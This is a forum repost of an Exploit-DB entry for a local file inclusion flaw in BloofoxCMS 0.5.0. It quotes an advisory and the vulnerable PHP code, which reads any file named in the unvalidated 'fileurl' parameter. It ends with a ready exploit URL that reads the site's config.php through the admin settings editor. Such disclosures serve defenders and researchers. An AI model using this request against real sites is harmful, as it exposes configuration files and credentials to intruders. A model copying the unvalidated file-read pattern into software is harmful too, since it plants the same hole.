Exploit BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39032
Проверка EDB
  1. Пройдено
Автор
ATT4CKXT3RR0R1ST
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2014-01-17
BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion
Код:
source: https://www.securityfocus.com/bid/65019/info
   
bloofoxCMS is prone to the following security vulnerabilities:
   
1. Multiple SQL-injection vulnerabilities
2. Multiple cross-site request forgery vulnerabilities
3. A local file-include vulnerability
   
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions.
   
bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected.
 
VULNERABILITY
##############
/admin/include/inc_settings_editor.php (line 56-69)

// show file
if(isset($_POST["fileurl"])) {
    $fileurl = $_POST["fileurl"];
}
if(isset($_GET["fileurl"])) {
    $fileurl = "../".$_GET["fileurl"];
}

if(file_exists($fileurl)) {
    $filelength = filesize($fileurl);
    $readfile = fopen($fileurl,"r");
    $file = fread($readfile,$filelength);
    fclose($readfile);
}



#########
EXPLOIT
#########

http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php
 
Источник
www.exploit-db.com

Похожие темы